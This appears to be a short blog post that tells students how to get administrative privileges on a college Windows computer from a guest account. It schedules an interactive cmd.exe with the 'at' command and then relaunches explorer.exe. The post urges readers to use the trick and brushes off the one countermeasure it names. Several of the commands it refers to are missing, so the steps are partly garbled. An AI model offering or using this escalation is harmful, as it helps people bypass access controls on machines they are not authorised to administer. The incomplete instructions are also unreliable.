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Hack into Your College computer with Administrative Priviliges

hack college computer from guest account

Open command prompt and type


and note the time, time will be presented in 24 hour clock format. Note this time.
Now open “Task Manager” by typing
now from processes and end explorer.exe .

Now type,

c:\>at [(time displayed in 24 hour clock format)+2 minutes] /interactive cmd.exe
for example
The current time is: 0:27:11.68
Enter the new time:
c:\>at 0:29:00:00 /interactive cmd.exe
Now type c:\>exit
and wait for two minutes. After two minutes command prompt will open in interactive mode with all administrative privileges without asking you for password. Now run any command from it it'll run with full administrative privileges so that you can even install programs and applications in system. So type “explorer.exe” in cmd and use system with administrative privilege even when you are in guest account.

Countermeasure: Disable command prompt for guest account.

By the way no college can ever disable command prompt because practicals are done over it, so guys get your stance and enjoy freedom.

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